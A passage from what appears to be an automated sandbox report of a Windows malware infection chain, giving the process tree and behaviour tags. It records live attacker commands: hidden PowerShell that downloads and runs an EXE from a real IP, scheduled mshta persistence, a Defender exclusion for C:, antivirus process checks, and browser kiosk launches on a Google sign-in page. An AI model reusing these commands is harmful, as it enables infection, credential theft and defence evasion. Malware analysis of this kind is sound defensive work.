cb4c35d17136af65b4eff25120bf21b1ef857d985f50ec4f015de008629fdf74.exe 97 PID 1308 wrote to memory of 5392 1308 cb4c35d17136af65b4eff25120bf21b1ef857d985f50ec4f015de008629fdf74.exe 97 PID 1308 wrote to memory of 5392 1308 cb4c35d17136af65b4eff25120bf21b1ef857d985f50ec4f015de008629fdf74.exe 97 PID 4592 wrote to memory of 4012 4592 rapes.exe 101 PID 4592 wrote to memory of 4012 4592 rapes.exe 101 PID 4592 wrote to memory of 4012 4592 rapes.exe 101 PID 4592 wrote to memory of 5524 4592 rapes.exe 103 PID 4592 wrote to memory of 5524 4592 rapes.exe 103 PID 4592 wrote to memory of 5524 4592 rapes.exe 103 PID 5524 wrote to memory of 728 5524 9a5599e506.exe 104 PID 5524 wrote to memory of 728 5524 9a5599e506.exe 104 PID 5524 wrote to memory of 728 5524 9a5599e506.exe 104 PID 5524 wrote to memory of 6128 5524 9a5599e506.exe 105 PID 5524 wrote to memory of 6128 5524 9a5599e506.exe 105 PID 5524 wrote to memory of 6128 5524 9a5599e506.exe 105 PID 728 wrote to memory of 1016 728 cmd.exe 107 PID 728 wrote to memory of 1016 728 cmd.exe 107 PID 728 wrote to memory of 1016 728 cmd.exe 107 PID 6128 wrote to memory of 3520 6128 mshta.exe 108 PID 6128 wrote to memory of 3520 6128 mshta.exe 108 PID 6128 wrote to memory of 3520 6128 mshta.exe 108 PID 4592 wrote to memory of 4340 4592 rapes.exe 110 PID 4592 wrote to memory of 4340 4592 rapes.exe 110 PID 4592 wrote to memory of 4340 4592 rapes.exe 110 PID 4340 wrote to memory of 4460 4340 cmd.exe 112 PID 4340 wrote to memory of 4460 4340 cmd.exe 112 PID 4340 wrote to memory of 4460 4340 cmd.exe 112 PID 3520 wrote to memory of 1108 3520 powershell.exe 113 PID 3520 wrote to memory of 1108 3520 powershell.exe 113 PID 3520 wrote to memory of 1108 3520 powershell.exe 113 PID 4012 wrote to memory of 740 4012 qWvzIGs.exe 114 PID 4012 wrote to memory of 740 4012 qWvzIGs.exe 114 PID 4012 wrote to memory of 740 4012 qWvzIGs.exe 114 PID 4012 wrote to memory of 740 4012 qWvzIGs.exe 114 PID 4012 wrote to memory of 740 4012 qWvzIGs.exe 114 PID 4012 wrote to memory of 740 4012 qWvzIGs.exe 114 PID 4012 wrote to memory of 740 4012 qWvzIGs.exe 114 PID 4012 wrote to memory of 740 4012 qWvzIGs.exe 114 PID 4012 wrote to memory of 740 4012 qWvzIGs.exe 114 PID 4340 wrote to memory of 4072 4340 cmd.exe 115 PID 4340 wrote to memory of 4072 4340 cmd.exe 115 PID 4340 wrote to memory of 4072 4340 cmd.exe 115 PID 4072 wrote to memory of 6128 4072 cmd.exe 116 PID 4072 wrote to memory of 6128 4072 cmd.exe 116 PID 4072 wrote to memory of 6128 4072 cmd.exe 116 PID 4340 wrote to memory of 3112 4340 cmd.exe 117 PID 4340 wrote to memory of 3112 4340 cmd.exe 117 PID 4340 wrote to memory of 3112 4340 cmd.exe 117 PID 3112 wrote to memory of 5232 3112 cmd.exe 118 PID 3112 wrote to memory of 5232 3112 cmd.exe 118 PID 3112 wrote to memory of 5232 3112 cmd.exe 118 PID 4340 wrote to memory of 1140 4340 cmd.exe 119 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2268
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2516
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3408
-
C:\Users\Admin\AppData\Local\Temp\cb4c35d17136af65b4eff25120bf21b1ef857d985f50ec4f015de008629fdf74.exe"C:\Users\Admin\AppData\Local\Temp\cb4c35d17136af65b4eff25120bf21b1ef857d985f50ec4f015de008629fdf74.exe"2⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\g0t53.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\g0t53.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3108 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1k62M0.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1k62M0.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5284 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4592 -
C:\Users\Admin\AppData\Local\Temp\10329270101\qWvzIGs.exe"C:\Users\Admin\AppData\Local\Temp\10329270101\qWvzIGs.exe"6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4012
-
-
C:\Users\Admin\AppData\Local\Temp\10331670101\9a5599e506.exe"C:\Users\Admin\AppData\Local\Temp\10331670101\9a5599e506.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5524 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn efZrjmaI9qc /tr "mshta C:\Users\Admin\AppData\Local\Temp\bAsNkKCLV.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:728 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn efZrjmaI9qc /tr "mshta C:\Users\Admin\AppData\Local\Temp\bAsNkKCLV.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1016
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\bAsNkKCLV.hta7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:6128 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UZDLOXU4SFD4LXVYFBDNXJH21WJW9DSD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3520 -
C:\Users\Admin\AppData\Local\TempUZDLOXU4SFD4LXVYFBDNXJH21WJW9DSD.EXE"C:\Users\Admin\AppData\Local\TempUZDLOXU4SFD4LXVYFBDNXJH21WJW9DSD.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1108
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10331680121\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4340 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4072 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6128
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3112 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5232
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:1140 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3576
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "YMztUmaZvrR" /tr "mshta \"C:\Temp\04VbTFnSX.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4088
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\04VbTFnSX.hta"7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:3920 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2460 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5468
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10331730101\U0nqzpy.exe"C:\Users\Admin\AppData\Local\Temp\10331730101\U0nqzpy.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2948
-
-
C:\Users\Admin\AppData\Local\Temp\10331780101\7855124a7b.exe"C:\Users\Admin\AppData\Local\Temp\10331780101\7855124a7b.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3520 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10331780101\7855124a7b.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5364
-
-
-
C:\Users\Admin\AppData\Local\Temp\10331790101\3e4d972bc6.exe"C:\Users\Admin\AppData\Local\Temp\10331790101\3e4d972bc6.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2780 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10331790101\3e4d972bc6.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2660
-
-
-
C:\Users\Admin\AppData\Local\Temp\10331800101\U0nqzpy.exe"C:\Users\Admin\AppData\Local\Temp\10331800101\U0nqzpy.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:944
-
-
C:\Users\Admin\AppData\Local\Temp\10331810101\tK0oYx3.exe"C:\Users\Admin\AppData\Local\Temp\10331810101\tK0oYx3.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2296 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5160
-
-
-
C:\Users\Admin\AppData\Local\Temp\10331820101\OkH8IPF.exe"C:\Users\Admin\AppData\Local\Temp\10331820101\OkH8IPF.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2872 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1820
-
-
-
C:\Users\Admin\AppData\Local\Temp\10331830101\zx4PJh6.exe"C:\Users\Admin\AppData\Local\Temp\10331830101\zx4PJh6.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5672 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat7⤵
- System Location Discovery: System Language Discovery
PID:2844 -
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5944
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"8⤵
- System Location Discovery: System Language Discovery
PID:1636
-
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5324
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"8⤵
- System Location Discovery: System Language Discovery
PID:5380
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4408248⤵
- System Location Discovery: System Language Discovery
PID:1372
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Architecture.wmv8⤵
- System Location Discovery: System Language Discovery
PID:3348
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Offensive" Inter8⤵
- System Location Discovery: System Language Discovery
PID:3940
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 440824\Organizations.com + Flexible + Damn + Hard + College + Corp + Cj + Boulevard + Drainage + Truth 440824\Organizations.com8⤵
- System Location Discovery: System Language Discovery
PID:4640
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Dancing.wmv + ..\Ka.wmv + ..\Bali.wmv + ..\Liability.wmv + ..\Lamps.wmv + ..\Electro.wmv + ..\Shakespeare.wmv + ..\Make.wmv + ..\Physiology.wmv + ..\Witness.wmv + ..\Submitting.wmv + ..\Bd.wmv h8⤵
- System Location Discovery: System Language Discovery
PID:4896
-
-
C:\Users\Admin\AppData\Local\Temp\440824\Organizations.comOrganizations.com h8⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5920 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 9809⤵
- Program crash
PID:3560
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 58⤵
- System Location Discovery: System Language Discovery
PID:1368
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10331840101\xu5e1_003.exe"C:\Users\Admin\AppData\Local\Temp\10331840101\xu5e1_003.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:2192 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵PID:6000
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6024
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:1280 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""8⤵
- Executes dropped EXE
PID:60
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""8⤵
- Deletes itself
- Executes dropped EXE
PID:1936 -
C:\Users\Admin\AppData\Local\Temp\{c38f4e37-be6e-4bf8-8484-b8f49aa4f677}\65cf7116.exe"C:\Users\Admin\AppData\Local\Temp\{c38f4e37-be6e-4bf8-8484-b8f49aa4f677}\65cf7116.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot9⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
PID:10272 -
C:\Users\Admin\AppData\Local\Temp\{74f4597a-5c8f-415f-89af-60079edb75e2}\c7a130a0.exeC:/Users/Admin/AppData/Local/Temp/{74f4597a-5c8f-415f-89af-60079edb75e2}/\c7a130a0.exe -accepteula -adinsilent -silent -processlevel 2 -postboot10⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Loads dropped DLL
- Adds Run key to start application
- Writes to the Master Boot Record (MBR)
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:11488
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10331850101\qWvzIGs.exe"C:\Users\Admin\AppData\Local\Temp\10331850101\qWvzIGs.exe"6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5080
-
-
C:\Users\Admin\AppData\Local\Temp\10331860101\RTH4oNP.exe"C:\Users\Admin\AppData\Local\Temp\10331860101\RTH4oNP.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:13172 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:2260
-
-
-
C:\Users\Admin\AppData\Local\Temp\10331870101\01.exe"C:\Users\Admin\AppData\Local\Temp\10331870101\01.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:7348 -
C:\Windows\system32\taskkill.exe"taskkill" /f /im pcidrv.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7376
-
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "PCI Bus Driver" /tr C:\Users\Admin\Drivers\busdrv.exe /sc minute /mo 1 /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:7416
-
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "PCI Bus Driver Startup" /tr C:\Users\Admin\Drivers\busdrv.exe /sc onstart /ru SYSTEM /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:7708
-
-
C:\Users\Admin\Drivers\busdrv.exe"C:\Users\Admin\Drivers\busdrv.exe"7⤵
- Executes dropped EXE
PID:2636
-
-
C:\Windows\system32\cmd.exe"cmd" /C timeout /t 2 && del C:\Users\Admin\AppData\Local\Temp\10331870101\01.exe7⤵PID:1856
-
C:\Windows\system32\timeout.exetimeout /t 28⤵
- Delays execution with timeout.exe
PID:8208
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10331880101\1a3866375e.exe"C:\Users\Admin\AppData\Local\Temp\10331880101\1a3866375e.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:8424 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:8488
-
-
-
C:\Users\Admin\AppData\Local\Temp\10331890101\854032868d.exe"C:\Users\Admin\AppData\Local\Temp\10331890101\854032868d.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:8812
-
-
C:\Users\Admin\AppData\Local\Temp\10331900101\ad03c7d3c9.exe"C:\Users\Admin\AppData\Local\Temp\10331900101\ad03c7d3c9.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:9556
-
-
C:\Users\Admin\AppData\Local\Temp\10331910101\eb09826175.exe"C:\Users\Admin\AppData\Local\Temp\10331910101\eb09826175.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:10120 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5108
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11648
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- Kills process with taskkill
PID:13024
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- Kills process with taskkill
PID:4308
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- Kills process with taskkill
PID:12360
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:12504
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵PID:12528
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2008 -prefsLen 27099 -prefMapHandle 2012 -prefMapSize 270279 -ipcHandle 2092 -initialChannelId {b680ccd9-4aaf-4a85-ac74-73b07387545e} -parentPid 12528 -crashReporter "\\.\pipe\gecko-crash-server-pipe.12528" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu9⤵PID:6552
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2540 -prefsLen 27135 -prefMapHandle 2544 -prefMapSize 270279 -ipcHandle 2552 -initialChannelId {d6d3ef90-8ce1-4cfe-860d-68852d4c841b} -parentPid 12528 -crashReporter "\\.\pipe\gecko-crash-server-pipe.12528" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket9⤵PID:8012
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3784 -prefsLen 25164 -prefMapHandle 3788 -prefMapSize 270279 -jsInitHandle 3792 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3816 -initialChannelId {26553fd8-6399-47f2-8e11-3c6c7b4f4e14} -parentPid 12528 -crashReporter "\\.\pipe\gecko-crash-server-pipe.12528" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab9⤵PID:1212
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3964 -prefsLen 27276 -prefMapHandle 3968 -prefMapSize 270279 -ipcHandle 4048 -initialChannelId {2ff185cf-215c-42f2-8b37-36d593ecbf4f} -parentPid 12528 -crashReporter "\\.\pipe\gecko-crash-server-pipe.12528" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd9⤵PID:1104
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4384 -prefsLen 34775 -prefMapHandle 4388 -prefMapSize 270279 -jsInitHandle 4392 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3016 -initialChannelId {c07a1e90-9157-491b-ba21-8c24f88a0ae2} -parentPid 12528 -crashReporter "\\.\pipe\gecko-crash-server-pipe.12528" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab9⤵PID:9632
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 2736 -prefsLen 35012 -prefMapHandle 2884 -prefMapSize 270279 -ipcHandle 4620 -initialChannelId {dc5c585c-3082-4001-87c0-cc98d6eb356c} -parentPid 12528 -crashReporter "\\.\pipe\gecko-crash-server-pipe.12528" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility9⤵PID:9080
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5180 -prefsLen 32900 -prefMapHandle 5228 -prefMapSize 270279 -jsInitHandle 5224 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5216 -initialChannelId {16bf3c43-2ac6-4151-9d51-922ae0fbfeab} -parentPid 12528 -crashReporter "\\.\pipe\gecko-crash-server-pipe.12528" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab9⤵PID:9992
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5432 -prefsLen 32900 -prefMapHandle 5436 -prefMapSize 270279 -jsInitHandle 5440 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5248 -initialChannelId {5234b528-3f2c-473c-bc23-2c0ca809ac9c} -parentPid 12528 -crashReporter "\\.\pipe\gecko-crash-server-pipe.12528" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab9⤵PID:7140
-
-
